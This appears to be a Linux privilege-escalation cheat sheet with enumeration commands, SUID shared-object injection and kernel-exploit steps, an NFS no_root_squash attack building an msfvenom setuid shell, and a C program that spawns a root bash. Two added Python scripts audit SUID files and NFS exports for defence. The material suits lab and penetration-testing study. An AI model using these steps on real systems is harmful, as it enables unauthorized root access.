Linux Privilege Escalation

OS & User Enumeration :

############################### User Enumeration ################################

whoami
id
sudo -l
cat /etc/passwd
ls -la /etc/shadow

################################# OS Enumeration #################################

cat /etc/issue
cat /etc/*-release
cat /proc/version
uname -a
arch
ldd --version

################################# Installed tools ################################

which awk perl python ruby gcc cc vi vim nmap find netcat nc wget tftp ftp 2>/dev/null

############################ File owners and permissions #########################

ls -la
find . -ls
history
cat ~/.bash_history
find / -type f -user <username> -readable 2>/dev/null   # Files readable by the given user
find / -writable -type d 2>/dev/null                      # Directories writable by the current user
find /usr/local/ -type d -writable                        # Writable directories under /usr/local

################################## File mount ####################################

ls -la /mnt /media   # usb devices and other mounted disks
mount                # show all the mounted drives
df -h                # list mounted partitions and their usage
cat /etc/fstab       # list all drives mounted at boot time
lsblk                # list block devices and their partitions

#################################### Applications ################################

dpkg -l # for Debian based systems

##################################### Cron tabs ##################################

ls -lah /etc/cron*
cat /etc/crontab
ls -la /var/log/cron*           # Locating cron logs
find / -name cronlog 2>/dev/null
grep "CRON" /var/log/cron.log   # for locating running jobs from logs
grep CRON /var/log/syslog       # grepping cron from syslog


#################################### Internal Ports ##############################

netstat -alnp | grep LISTEN | grep <port_num>
netstat -antp
netstat -tulnp
curl http://127.0.0.1:<port_num>/   # probe each locally listening port

################################### Interesting DIRS #############################
/
/dev
/scripts
/opt
/mnt
/var/www/html
/var
/etc
/media
/backup

################################### SUID Binaries ################################

(https://www.hackingarticles.in/linux-privilege-escalation-using-suid-binaries/)

find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2> /dev/null
find / -perm -u=s -type f 2>/dev/null
find / -perm -4000 -user root 2>/dev/null
ldd /usr/bin/binary-name
strace /usr/local/bin/fishybinary 2>&1 | grep -iE "open|access|no such file"

################################# Firewall Enumeration ###########################

grep -Hs iptables /etc/*

############################### Kernel Modules ##################################

lsmod
/sbin/modinfo <mod name>

PrivEsc Checklist :

SUID Shared Object Injection :

  • Find a SUID binary that looks fishy

  • strace /usr/local/bin/fishybinary 2>&1 | grep -iE "open|access|no such file"

  • Identify a shared object the binary fails to find whose lookup path is writable by you

  • Create a shared object with the missing SO's file name in that writable path

  • run the SUID binary
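The checklist above works only when a SUID binary exists that the administrator did not intend, or when one of its shared objects is unresolved. The following audit script is an added example, not part of the original notes: it walks a tree for setuid/setgid files the way the `find -perm` commands in the SUID Binaries section do, compares the result against an approved baseline, and parses `ldd` output for `not found` dependencies so that the gap can be closed before anyone exploits it. The binary name `fishybinary` is taken from the notes; the library name `libcalc.so` and the `ldd` text are constructed for the demo.

```python
import os
import stat
import tempfile

def classify_mode(mode):
    """Return the set-id bits present in a raw st_mode value, e.g. ['setuid', 'setgid']."""
    flags = []
    if mode & stat.S_ISUID:
        flags.append("setuid")
    if mode & stat.S_ISGID:
        flags.append("setgid")
    return flags

def _same_device(path, dev):
    try:
        return os.lstat(path).st_dev == dev
    except OSError:
        return False

def find_setid_files(root):
    """Walk `root` and return {path: flags} for every regular file carrying setuid or setgid.
    Equivalent to `find <root> -xdev -type f \\( -perm -u+s -o -perm -g+s \\)`: symlinks are
    not followed and other filesystems (/proc, /sys, network mounts) are pruned."""
    results = {}
    root_dev = os.lstat(root).st_dev
    for dirpath, dirnames, filenames in os.walk(root):
        dirnames[:] = [d for d in dirnames if _same_device(os.path.join(dirpath, d), root_dev)]
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            if not stat.S_ISREG(st.st_mode):
                continue
            flags = classify_mode(st.st_mode)
            if flags:
                results[path] = flags
    return results

def unexpected_setid(found, baseline):
    """Paths in `found` that are absent from the approved `baseline` set: these are the
    binaries to investigate, or to strip the bit from with `chmod u-s`."""
    return sorted(p for p in found if p not in baseline)

def missing_libraries(ldd_output):
    """Parse `ldd <binary>` output and return the libraries the loader could not resolve.
    An unresolved dependency on a SUID binary is the gap the injection checklist relies on;
    fix it by installing the library or rebuilding the binary, not by leaving a writable path."""
    missing = []
    for line in ldd_output.splitlines():
        if "=> not found" in line:
            missing.append(line.split("=>", 1)[0].strip())
    return missing

# Constructed ldd output for the demo (not captured from a real binary).
SAMPLE_LDD = """\
\tlinux-vdso.so.1 (0x00007ffd1a3f0000)
\tlibcalc.so => not found
\tlibc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007f0e2c400000)
\t/lib64/ld-linux-x86-64.so.2 (0x00007f0e2c620000)
"""

def demo():
    """Build a throwaway tree with one setuid file, audit it against an empty baseline and
    return the unexpected entries together with the unresolved library names."""
    with tempfile.TemporaryDirectory() as root:
        bin_dir = os.path.join(root, "usr", "local", "bin")
        os.makedirs(bin_dir)
        target = os.path.join(bin_dir, "fishybinary")
        with open(target, "wb") as fh:
            fh.write(b"\x7fELF")          # placeholder bytes, not a real executable
        os.chmod(target, 0o4755)          # rwsr-xr-x, owned by whoever runs the demo
        found = find_setid_files(root)
        unexpected = unexpected_setid(found, baseline=set())
        return {os.path.relpath(p, root): found[p] for p in unexpected}, missing_libraries(SAMPLE_LDD)

if __name__ == "__main__":
    print(demo())
```

Run it periodically with a baseline built from a clean install (`find_setid_files("/")` on a known-good host) and alert on anything `unexpected_setid` returns; a new setuid file under /usr/local or /tmp is a much stronger signal than the raw `find` listing.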

NFS Misconfiguration :

https://tryhackme.com/room/linuxprivesc (Task 19)

  • cat /etc/exports

  • On Kali

    • mkdir /tmp/nfs

    • mount -o rw,vers=2 10.10.10.10:/tmp /tmp/nfs

    • msfvenom -p linux/x86/exec CMD="/bin/bash -p" -f elf -o /tmp/nfs/shell.elf

    • chmod +xs /tmp/nfs/shell.elf

  • On Target

    • /tmp/shell.elf
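The mount-and-setuid sequence above only works because the export honours the client's uid 0 (`no_root_squash`). As an added example, not part of the original notes or the TryHackMe room, the script below parses exports(5) syntax, reports the weak options, and renders a hardened version of each line. The `/etc/exports` content is constructed for the demo; the `insecure` and `no_root_squash` option names are the real ones from exports(5).

```python
# Constructed /etc/exports for the demo (not from any real host).
SAMPLE_EXPORTS = """\
# /etc/exports: the access control list for filesystems which may be exported
/tmp            *(rw,sync,insecure,no_root_squash,no_subtree_check)
/srv/share      192.168.1.0/24(rw,sync,root_squash)
/srv/ro         10.0.0.5(ro) 10.0.0.6(ro,no_root_squash)
/srv/public     (rw)
"""

# Options that weaken an export: (why it matters, replacement for a hardened line or None to drop).
RISKY_OPTIONS = {
    "no_root_squash": ("remote uid 0 is honoured, so a setuid file written by a client stays root-owned", "root_squash"),
    "insecure": ("requests from unprivileged source ports are accepted", None),
}

def parse_exports(text):
    """Return [(path, client, options)] from exports(5) syntax. A missing client
    (including the classic `/path (rw)` with a space before the parenthesis) means every host."""
    entries = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()   # strip comments and blank lines
        if not line:
            continue
        fields = line.split()
        path, specs = fields[0], fields[1:] or ["*"]
        for spec in specs:
            if "(" in spec:
                client, opts = spec.split("(", 1)
                options = {o for o in opts.rstrip(")").split(",") if o}
            else:
                client, options = spec, set()
            entries.append((path, client or "*", options))
    return entries

def audit_exports(text):
    """Return (path, client, problem, detail) for every weak entry in the exports text."""
    findings = []
    for path, client, options in parse_exports(text):
        for opt, (detail, _fix) in RISKY_OPTIONS.items():
            if opt in options:
                findings.append((path, client, opt, detail))
        if client == "*" and "rw" in options:
            findings.append((path, client, "world-writable",
                             "exported read-write to every host; restrict to a host or subnet"))
    return findings

def harden_options(options):
    """Return the option set with risky options dropped or replaced (no_root_squash -> root_squash)."""
    hardened = set(options)
    for opt, (_detail, replacement) in RISKY_OPTIONS.items():
        if opt in hardened:
            hardened.discard(opt)
            if replacement:
                hardened.add(replacement)
    return hardened

def hardened_exports(text):
    """Render every entry with hardened options; a wildcard client is left for a human
    to restrict and is marked with a trailing comment."""
    lines = []
    for path, client, options in parse_exports(text):
        opts = ",".join(sorted(harden_options(options)))
        note = "   # TODO: restrict client" if client == "*" else ""
        lines.append(f"{path}\t{client}({opts}){note}")
    return "\n".join(lines)

if __name__ == "__main__":
    for finding in audit_exports(SAMPLE_EXPORTS):
        print("WEAK:", *finding)
    print(hardened_exports(SAMPLE_EXPORTS))
```

`root_squash` is the NFS server default, so an explicit `no_root_squash` in the file is always a deliberate choice worth questioning; after editing the file, `exportfs -ra` reloads it.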

Kernel Exploits :

  • cat /proc/version

  • uname -r

  • uname -mrs

  • cat /etc/lsb-release

  • cat /etc/os-release

  • gcc exploit.c -o exp

  • Compile the exploit on the local machine and upload it to the remote machine

    • gcc -m32 -Wl,--hash-style=both 9542.c -o 9542

    • apt-get install gcc-multilib   # required before building 32-bit (-m32) binaries on a 64-bit host

Recover Deleted Files :

C Program to SetUID /bin/bash :

gcc -Wall suid.c -o exploit

sudo chown root exploit

sudo chmod u+s exploit

$ ls -l exploit
-rwsr-xr-x 1 root users 6894 11 sept. 22:05 exploit

#include <unistd.h>

int main(void)
{
    /* Set real, effective and saved UIDs to 0; succeeds only because the file is setuid root. */
    setuid(0);
    /* Replace this process with bash; with all UIDs already 0, bash keeps the privileges. */
    execl("/bin/bash", "bash", (char *)NULL);
    return 0;
}

./exploit   # in the new shell, `whoami` prints root

Tools :

Resources :
